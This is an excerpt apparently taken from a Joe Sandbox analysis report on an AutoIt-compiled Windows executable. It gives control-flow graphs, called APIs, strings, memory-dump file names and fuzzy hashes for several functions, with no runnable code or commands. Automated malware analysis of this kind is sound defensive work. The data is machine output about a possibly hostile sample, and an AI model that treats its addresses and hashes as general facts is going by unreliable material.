7ff79f8d9534-7ff79f8d953c 526->533 534 7ff79f8d9510-7ff79f8d9518 526->534 550 7ff79f8d96b5-7ff79f8d96d5 call 7ff79f8e32f4 527->550 551 7ff79f8d96d7-7ff79f8d96dc GetSystemInfo 527->551 536 7ff79f891f33 528->536 537 7ff79f8d95d8-7ff79f8d95e8 528->537 529->518 538 7ff79f8d95f6-7ff79f8d9620 529->538 530->518 531->518 542 7ff79f8d954c-7ff79f8d9554 533->542 543 7ff79f8d953e-7ff79f8d9547 533->543 540 7ff79f8d9526-7ff79f8d952f 534->540 541 7ff79f8d951a-7ff79f8d9521 534->541 536->518 537->518 547 7ff79f8d9630-7ff79f8d9640 538->547 548 7ff79f8d9622-7ff79f8d962b 538->548 549 7ff79f891f91-7ff79f891fc0 539->549 540->518 541->518 544 7ff79f8d9564-7ff79f8d956d 542->544 545 7ff79f8d9556-7ff79f8d955f 542->545 543->518 544->518 545->518 547->518 548->518 553 7ff79f8d96e2-7ff79f8d96ea 550->553 551->553 553->549 554 7ff79f8d96f0-7ff79f8d96f7 FreeLibrary 553->554 554->549
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                • String ID: |O
                                                                                • API String ID: 1568231622-607156228
                                                                                • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                • Instruction ID: 76ada9c6bc435a13c6c5c8b2e364daac8fa72cff78396b8e6e5258a52d188fe6
                                                                                • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                • Instruction Fuzzy Hash: 5BD1AE21E1DAC285FAB1AB30A8905F5EB90AF917A4FC00036D58D832BDEF6CB551D731
                                                                                Function 00007FF79F90F630 Relevance: 12.4, APIs: 8, Instructions: 350processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 719 7ff79f90f630-7ff79f90f69e call 7ff79f896240 722 7ff79f90f6a0-7ff79f90f6b8 call 7ff79f87ffbc 719->722 723 7ff79f90f6d4-7ff79f90f6d9 719->723 733 7ff79f90f708-7ff79f90f70d 722->733 734 7ff79f90f6ba-7ff79f90f6d2 call 7ff79f87ffbc 722->734 725 7ff79f90f6db-7ff79f90f6ef call 7ff79f87ffbc 723->725 726 7ff79f90f71e-7ff79f90f723 723->726 736 7ff79f90f6f3-7ff79f90f706 call 7ff79f87ffbc 725->736 728 7ff79f90f725-7ff79f90f729 726->728 729 7ff79f90f736-7ff79f90f75c call 7ff79f87d4cc call 7ff79f87e330 726->729 732 7ff79f90f72d-7ff79f90f732 call 7ff79f87ffbc 728->732 748 7ff79f90f840-7ff79f90f84a 729->748 749 7ff79f90f762-7ff79f90f7cf call 7ff79f87d4cc call 7ff79f87e330 call 7ff79f87d4cc call 7ff79f87e330 call 7ff79f87d4cc call 7ff79f87e330 729->749 732->729 737 7ff79f90f719-7ff79f90f71c 733->737 738 7ff79f90f70f-7ff79f90f717 733->738 734->736 736->726 736->733 737->726 737->729 738->732 751 7ff79f90f84c-7ff79f90f86e call 7ff79f87d4cc call 7ff79f87e330 748->751 752 7ff79f90f87d-7ff79f90f8af GetCurrentDirectoryW call 7ff79f894c68 GetCurrentDirectoryW 748->752 799 7ff79f90f7d1-7ff79f90f7f3 call 7ff79f87d4cc call 7ff79f87e330 749->799 800 7ff79f90f806-7ff79f90f83e GetSystemDirectoryW call 7ff79f894c68 GetSystemDirectoryW 749->800 751->752 766 7ff79f90f870-7ff79f90f87b call 7ff79f898d58 751->766 760 7ff79f90f8b5-7ff79f90f8b8 752->760 763 7ff79f90f8ba-7ff79f90f8eb call 7ff79f88f688 * 3 760->763 764 7ff79f90f8f0-7ff79f90f8ff call 7ff79f8ef464 760->764 763->764 774 7ff79f90f901-7ff79f90f903 764->774 775 7ff79f90f905-7ff79f90f95d call 7ff79f8efddc call 7ff79f8efca8 call 7ff79f8efafc 764->775 766->752 766->764 779 7ff79f90f964-7ff79f90f96c 774->779 775->779 807 7ff79f90f95f 775->807 784 7ff79f90fa0f-7ff79f90fa4b CreateProcessW 779->784 785 7ff79f90f972-7ff79f90fa0d call 7ff79f8dd1f8 call 7ff79f898d58 * 3 call 7ff79f894c24 * 3 779->785 789 7ff79f90fa4f-7ff79f90fa62 call 7ff79f894c24 * 2 784->789 785->789 813 7ff79f90fabe-7ff79f90faca CloseHandle 789->813 814 7ff79f90fa64-7ff79f90fabc call 7ff79f874afc * 2 GetLastError call 7ff79f88f214 call 7ff79f8813e0 789->814 799->800 824 7ff79f90f7f5-7ff79f90f800 call 7ff79f898d58 799->824 800->760 807->779 818 7ff79f90facc-7ff79f90faf0 call 7ff79f8ef7dc call 7ff79f8f0088 call 7ff79f90fb68 813->818 819 7ff79f90faf5-7ff79f90fafc 813->819 826 7ff79f90fb3b-7ff79f90fb65 call 7ff79f8ef51c 814->826 818->819 820 7ff79f90fb0c-7ff79f90fb35 call 7ff79f8813e0 CloseHandle 819->820 821 7ff79f90fafe-7ff79f90fb0a 819->821 820->826 821->826 824->760 824->800
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 1787492119-0
                                                                                • Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                                • Instruction ID: 5c7761cf813d63fc1e9b02d0ee0de77c885849c71b74a775bef59f804824c8fd
                                                                                • Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                                • Instruction Fuzzy Hash: 69E1B022B18B8185EB60EB36D4406FDA3B0FB85B98F844536EE1D87799DF38E455C710
                                                                                Function 00007FF79F8EC7C0 Relevance: 6.0, APIs: 4, Instructions: 24filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2695905019-0
                                                                                • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                • Instruction ID: 8c6e95067879b05f215c1e91570773d15622332d9164d9142e6bf0f53dad6def
                                                                                • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                • Instruction Fuzzy Hash: 01F05450E18692C1EA747B34AC4D7B49360AF56B75F945330D47E4A2E4DF6C94589110
                                                                                Function 00007FF79F877920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                • API String ID: 2667193904-1575078665
                                                                                • Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                                • Instruction ID: ece39453c992382438e8e48fd71a81c35301390344767b07c81dddabe0c4474f
                                                                                • Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                                • Instruction Fuzzy Hash: CB914F22A18AC395EB70BB34E8405F9A364FF84768FC01132E54D87AA9DF7CE255D720
                                                                                Function 00007FF79F875DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 131 7ff79f875dec-7ff79f875e21 133 7ff79f875e23-7ff79f875e26 131->133 134 7ff79f875e91-7ff79f875e94 131->134 136 7ff79f875e98 133->136 137 7ff79f875e28-7ff79f875e2f 133->137 134->133 135 7ff79f875e96 134->135 138 7ff79f875e6b-7ff79f875e76 DefWindowProcW 135->138 139 7ff79f875e9e-7ff79f875ea3 136->139 140 7ff79f8bc229-7ff79f8bc261 call 7ff79f88ede4 call 7ff79f892c44 136->140 141 7ff79f875e35-7ff79f875e3a 137->141 142 7ff79f875f21-7ff79f875f29 PostQuitMessage 137->142 144 7ff79f875e7c-7ff79f875e90 138->144 146 7ff79f875ecc-7ff79f875efa SetTimer RegisterWindowMessageW 139->146 147 7ff79f875ea5-7ff79f875ea8 139->147 175 7ff79f8bc267-7ff79f8bc26e 140->175 148 7ff79f8bc2af-7ff79f8bc2c5 call 7ff79f8ea40c 141->148 149 7ff79f875e40-7ff79f875e43 141->149 145 7ff79f875ec8-7ff79f875eca 142->145 145->144 146->145 150 7ff79f875efc-7ff79f875f09 CreatePopupMenu 146->150 155 7ff79f875eae-7ff79f875ebe KillTimer call 7ff79f875d88 147->155 156 7ff79f8bc1b8-7ff79f8bc1bb 147->156 148->145 167 7ff79f8bc2cb 148->167 151 7ff79f875f2b-7ff79f875f35 call 7ff79f894610 149->151 152 7ff79f875e49-7ff79f875e4e 149->152 150->145 169 7ff79f875f3a 151->169 157 7ff79f8bc292-7ff79f8bc299 152->157 158 7ff79f875e54-7ff79f875e59 152->158 172 7ff79f875ec3 call 7ff79f877098 155->172 162 7ff79f8bc1f7-7ff79f8bc224 MoveWindow 156->162 163 7ff79f8bc1bd-7ff79f8bc1c0 156->163 157->138 173 7ff79f8bc29f-7ff79f8bc2aa call 7ff79f8dc54c 157->173 165 7ff79f875f0b-7ff79f875f1f call 7ff79f875f3c 158->165 166 7ff79f875e5f-7ff79f875e65 158->166 162->145 170 7ff79f8bc1c2-7ff79f8bc1c5 163->170 171 7ff79f8bc1e4-7ff79f8bc1f2 SetFocus 163->171 165->145 166->138 166->175 167->138 169->145 170->166 176 7ff79f8bc1cb-7ff79f8bc1df call 7ff79f88ede4 170->176 171->145 172->145 173->138 175->138 180 7ff79f8bc274-7ff79f8bc28d call 7ff79f875d88 call 7ff79f876258 175->180 176->145 180->138
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated
                                                                                • API String ID: 129472671-2362178303
                                                                                • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                • Instruction ID: 4e825c2d73764e329de8598da47816317884d293ce18cc86e322227f51844dff
                                                                                • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                • Instruction Fuzzy Hash: AE516D3291CAD381F7B0BB34EA84AF8E750AF55750FC40431D44D8A7A9DE6CF5A4A320
                                                                                Function 00007FF79F873D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-2659433951
                                                                                • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                • Instruction ID: f02c9e6aa3cba4375f5b8a6eb3fd18d372ae929d7a8181a7c0045a6b4cab118b
                                                                                • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                • Instruction Fuzzy Hash: BE313632A04B819AE720EF70E8843E877B4FB44768F900139CA5D96B6CDF7C9158CB90
                                                                                Function 00007FF79F88E958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304comCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 189 7ff79f88e958-7ff79f88e9ae 190 7ff79f8d27e4-7ff79f8d27ea DestroyWindow 189->190 191 7ff79f88e9b4-7ff79f88e9d3 mciSendStringW 189->191 194 7ff79f8d27f0-7ff79f8d2801 190->194 192 7ff79f88e9d9-7ff79f88e9e3 191->192 193 7ff79f88ecbd-7ff79f88ecce 191->193 192->194 195 7ff79f88e9e9 192->195 196 7ff79f88ecd0-7ff79f88ecf0 UnregisterHotKey 193->196 197 7ff79f88ecf7-7ff79f88ed01 193->197 199 7ff79f8d2803-7ff79f8d2806 194->199 200 7ff79f8d2835-7ff79f8d283f 194->200 198 7ff79f88e9f0-7ff79f88e9f3 195->198 196->197 201 7ff79f88ecf2 call 7ff79f88f270 196->201 197->192 202 7ff79f88ed07 197->202 204 7ff79f88ecb0-7ff79f88ecb8 call 7ff79f875410 198->204 205 7ff79f88e9f9-7ff79f88ea08 call 7ff79f873aa8 198->205 206 7ff79f8d2813-7ff79f8d2817 FindClose 199->206 207 7ff79f8d2808-7ff79f8d2811 call 7ff79f878314 199->207 200->194 203 7ff79f8d2841 200->203 201->197 202->193 214 7ff79f8d2846-7ff79f8d284f call 7ff79f908c00 203->214 204->198 220 7ff79f88ea0f-7ff79f88ea12 205->220 212 7ff79f8d281d-7ff79f8d282e 206->212 207->212 212->200 213 7ff79f8d2830 call 7ff79f8f3180 212->213 213->200 214->220 220->214 222 7ff79f88ea18 220->222 223 7ff79f88ea1f-7ff79f88ea22 222->223 224 7ff79f8d2854-7ff79f8d285d call 7ff79f8e46cc 223->224 225 7ff79f88ea28-7ff79f88ea32 223->225 224->223 226 7ff79f8d2862-7ff79f8d2873 225->226 227 7ff79f88ea38-7ff79f88ea42 225->227 232 7ff79f8d2875 FreeLibrary 226->232 233 7ff79f8d287b-7ff79f8d2885 226->233 229 7ff79f8d288c-7ff79f8d289d 227->229 230 7ff79f88ea48-7ff79f88ea76 call 7ff79f8813e0 227->230 234 7ff79f8d289f-7ff79f8d28c2 VirtualFree 229->234 235 7ff79f8d28c9-7ff79f8d28d3 229->235 242 7ff79f88eabf-7ff79f88eacc OleUninitialize 230->242 243 7ff79f88ea78 230->243 232->233 233->226 237 7ff79f8d2887 233->237 234->235 238 7ff79f8d28c4 call 7ff79f8f321c 234->238 235->229 240 7ff79f8d28d5 235->240 237->229 238->235 245 7ff79f8d28da-7ff79f8d28de 240->245 242->245 246 7ff79f88ead2-7ff79f88ead9 242->246 244 7ff79f88ea7d-7ff79f88eabd call 7ff79f88f1c4 call 7ff79f88f13c 243->244 244->242 245->246 248 7ff79f8d28e4-7ff79f8d28ef 245->248 249 7ff79f88eadf-7ff79f88eaea 246->249 250 7ff79f8d28f4-7ff79f8d2903 call 7ff79f8f31d4 246->250 248->246 253 7ff79f88eaf0-7ff79f88eb22 call 7ff79f87a07c call 7ff79f88f08c call 7ff79f8739bc 249->253 254 7ff79f88ed09-7ff79f88ed18 call 7ff79f8942a0 249->254 262 7ff79f8d2905 250->262 273 7ff79f88eb24-7ff79f88eb29 call 7ff79f894c24 253->273 274 7ff79f88eb2e-7ff79f88ebc4 call 7ff79f8739bc call 7ff79f87a07c call 7ff79f8745c8 * 2 call 7ff79f87a07c * 3 call 7ff79f8813e0 call 7ff79f88ee68 call 7ff79f88ee2c * 3 253->274 254->253 265 7ff79f88ed1e 254->265 266 7ff79f8d290a-7ff79f8d2919 call 7ff79f8e3a78 262->266 265->254 272 7ff79f8d291b 266->272 277 7ff79f8d2920-7ff79f8d292f call 7ff79f88e4e4 272->277 273->274 274->266 316 7ff79f88ebca-7ff79f88ebdc call 7ff79f8739bc 274->316 283 7ff79f8d2931 277->283 286 7ff79f8d2936-7ff79f8d2945 call 7ff79f8f3078 283->286 293 7ff79f8d2947 286->293 296 7ff79f8d294c-7ff79f8d295b call 7ff79f8f31a8 293->296 301 7ff79f8d295d 296->301 304 7ff79f8d2962-7ff79f8d2971 call 7ff79f8f31a8 301->304 310 7ff79f8d2973 304->310 310->310 316->277 319 7ff79f88ebe2-7ff79f88ebec 316->319 319->286 320 7ff79f88ebf2-7ff79f88ec08 call 7ff79f87a07c 319->320 323 7ff79f88ed20-7ff79f88ed25 call 7ff79f894c24 320->323 324 7ff79f88ec0e-7ff79f88ec18 320->324 323->190 326 7ff79f88ec8a-7ff79f88eca9 call 7ff79f87a07c call 7ff79f894c24 324->326 327 7ff79f88ec1a-7ff79f88ec24 324->327 337 7ff79f88ecab 326->337 327->296 330 7ff79f88ec2a-7ff79f88ec3b 327->330 330->304 332 7ff79f88ec41-7ff79f88ed71 call 7ff79f87a07c * 3 call 7ff79f88ee10 call 7ff79f88ed8c 330->332 347 7ff79f88ed77-7ff79f88ed88 332->347 348 7ff79f8d2978-7ff79f8d2987 call 7ff79f8fd794 332->348 337->327 351 7ff79f8d2989 348->351 351->351
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                • String ID: close all
                                                                                • API String ID: 1992507300-3243417748
                                                                                • Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                                • Instruction ID: 866bfff959d42c16b3a8b400665cf9dcf3b9744f78933353e43888e974113bcb
                                                                                • Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                                • Instruction Fuzzy Hash: A6E15021B0998291EEA4FF66C550AFCA320BF94B54F944032DB1E57691DF3CE872A720
                                                                                Function 00007FF79F873B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: AutoIt v3
                                                                                • API String ID: 423443420-1704141276
                                                                                • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                • Instruction ID: 1fae7c7a6b7d329bf5b91ad294b8480375b20d1e294b52b7a4f829282e936460
                                                                                • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                • Instruction Fuzzy Hash: C9311836A08F829AE760EB61F8847E8B374BB84765F800139C94D97B2CDF7DD0548760
                                                                                Function 00007FF79F8B7348 Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 419 7ff79f8b7348-7ff79f8b73ba call 7ff79f8b7078 422 7ff79f8b73d3-7ff79f8b73dd call 7ff79f8ae418 419->422 423 7ff79f8b73bc-7ff79f8b73c4 call 7ff79f8a55b4 419->423 428 7ff79f8b73df-7ff79f8b73f5 call 7ff79f8a55b4 call 7ff79f8a55d4 422->428 429 7ff79f8b73f7-7ff79f8b7463 CreateFileW 422->429 430 7ff79f8b73c7-7ff79f8b73ce call 7ff79f8a55d4 423->430 428->430 432 7ff79f8b7469-7ff79f8b7470 429->432 433 7ff79f8b74eb-7ff79f8b74f6 GetFileType 429->433 447 7ff79f8b771a-7ff79f8b7736 430->447 436 7ff79f8b7472-7ff79f8b7476 432->436 437 7ff79f8b74b8-7ff79f8b74e6 GetLastError call 7ff79f8a5564 432->437 439 7ff79f8b7549-7ff79f8b754f 433->439 440 7ff79f8b74f8-7ff79f8b7533 GetLastError call 7ff79f8a5564 CloseHandle 433->440 436->437 445 7ff79f8b7478-7ff79f8b74b6 CreateFileW 436->445 437->430 443 7ff79f8b7551-7ff79f8b7554 439->443 444 7ff79f8b7556-7ff79f8b7559 439->444 440->430 453 7ff79f8b7539-7ff79f8b7544 call 7ff79f8a55d4 440->453 450 7ff79f8b755e-7ff79f8b75ac call 7ff79f8ae334 443->450 444->450 451 7ff79f8b755b 444->451 445->433 445->437 458 7ff79f8b75c0-7ff79f8b75ea call 7ff79f8b6de4 450->458 459 7ff79f8b75ae-7ff79f8b75ba call 7ff79f8b7284 450->459 451->450 453->430 464 7ff79f8b75fe-7ff79f8b7643 458->464 465 7ff79f8b75ec 458->465 466 7ff79f8b75ef-7ff79f8b75f9 call 7ff79f8b04b8 459->466 467 7ff79f8b75bc 459->467 469 7ff79f8b7665-7ff79f8b7671 464->469 470 7ff79f8b7645-7ff79f8b7649 464->470 465->466 466->447 467->458 473 7ff79f8b7677-7ff79f8b767b 469->473 474 7ff79f8b7718 469->474 470->469 472 7ff79f8b764b-7ff79f8b7660 470->472 472->469 473->474 475 7ff79f8b7681-7ff79f8b76c9 CloseHandle CreateFileW 473->475 474->447 476 7ff79f8b76fe-7ff79f8b7713 475->476 477 7ff79f8b76cb-7ff79f8b76f9 GetLastError call 7ff79f8a5564 call 7ff79f8ae548 475->477 476->474 477->476
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                • String ID:
                                                                                • API String ID: 1617910340-0
                                                                                • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                • Instruction ID: 17ebb8df769061755bc0dfbfdaefc3d51f5ac17e8f3c6f4249131c6b3080effb
                                                                                • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                • Instruction Fuzzy Hash: 64C1DE32B28B818AEBA0DB74D8817EC7761EB497A8F411235DE2E5B795DF38D065C310
